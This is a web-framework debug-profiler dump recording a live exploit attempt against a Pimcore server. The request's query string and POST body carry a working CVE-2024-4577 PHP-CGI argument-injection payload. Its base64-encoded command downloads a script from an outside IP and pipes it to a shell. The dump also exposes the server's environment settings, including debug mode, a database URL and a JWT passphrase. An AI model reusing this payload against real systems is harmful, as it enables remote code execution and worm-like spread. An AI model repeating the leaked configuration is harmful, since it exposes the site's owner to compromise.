Request / Response
Request
GET Parameters
| Key | Value |
|---|---|
| �d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
| Key | Value |
|---|---|
| <?php_shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMTQuNDYuMTM2Ljc3L3NoIHx8IGN1cmwgLXNrIGh0dHBzOi8vMTQuNDYuMTM2Ljc3L3NoKSB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA | "=")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _editmode | false |
| _pimcore_context | "default" |
| _pimcore_frontend_request | true |
| _remove_csp_headers | true |
| _stopwatch_token | "85ba7f" |
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| connection | "keep-alive" |
| content-length | "241" |
| content-type | "application/x-www-form-urlencoded" |
| host | "35.214.175.138:443" |
| upgrade-insecure-requests | "1" |
| user-agent | "libredtail-http" |
| x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMTQuNDYuMTM2Ljc3L3NoIHx8IGN1cmwgLXNrIGh0dHBzOi8vMTQuNDYuMTM2Ljc3L3NoKSB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "private, must-revalidate" |
| content-language | "en" |
| content-type | "text/html; charset=UTF-8" |
| date | "Fri, 05 Jun 2026 06:07:10 GMT" |
| expires | "Tue, 01 Jan 1980 00:00:00 GMT" |
| pragma | "no-cache" |
| vary | "Accept" |
| x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2F35.214.175.138%2Fhello.world%22" |
| x-debug-exception-file | "%2Fvar%2Fwww%2Fvhosts%2Fpimcore%2Flive_deployment%2Freleases%2F22%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:127" |
| x-debug-token | "ea7562" |
| x-debug-token-link | "https://35.214.175.138/_profiler/95c17d" |
| x-powered-by | "pimcore" |
| x-previous-debug-token | "95c17d" |
| x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| APP_ENV | "dev" |
| DATABASE_URL | "mysql://pimcore:[email protected]:3306/dam" |
| JWT_PASSPHRASE | "testing123" |
| JWT_PUBLIC_KEY | "%kernel.project_dir%/config/jwt/public.pem" |
| JWT_SECRET_KEY | "%kernel.project_dir%/config/jwt/private.pem" |
| PIMCORE_DEV_MODE | "true" |
| REQUIRED_SCHEME | "true" |
Defined as regular env variables
| Key | Value |
|---|---|
| CONTENT_LENGTH | "241" |
| CONTENT_TYPE | "application/x-www-form-urlencoded" |
| DOCTRINE_DEPRECATIONS | "trigger" |
| DOCUMENT_ROOT | "/var/www/vhosts/pimcore/htdocs/public" |
| DOCUMENT_URI | "/index.php" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/var/www/vhosts/pimcore" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_CONNECTION | "keep-alive" |
| HTTP_CONTENT_LENGTH | "241" |
| HTTP_CONTENT_TYPE | "application/x-www-form-urlencoded" |
| HTTP_HOST | "35.214.175.138:443" |
| HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
| HTTP_USER_AGENT | "libredtail-http" |
| PATH_INFO | "" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| REDIRECT_STATUS | "200" |
| REMOTE_ADDR | "152.32.132.28" |
| REMOTE_PORT | "24680" |
| REMOTE_USER | "" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1780639630 |
| REQUEST_TIME_FLOAT | 1780639630.1611 |
| REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| SCRIPT_FILENAME | "/var/www/vhosts/pimcore/live_deployment/releases/22/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "10.164.0.7" |
| SERVER_NAME | "dam.nemesisnow.com" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SOFTWARE | "nginx/1.18.0" |
| SHELL_VERBOSITY | 3 |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_DEBUG,PIMCORE_DEV_MODE,REQUIRED_SCHEME,DATABASE_URL,JWT_SECRET_KEY,JWT_PUBLIC_KEY,JWT_PASSPHRASE" |
| USER | "pimcore" |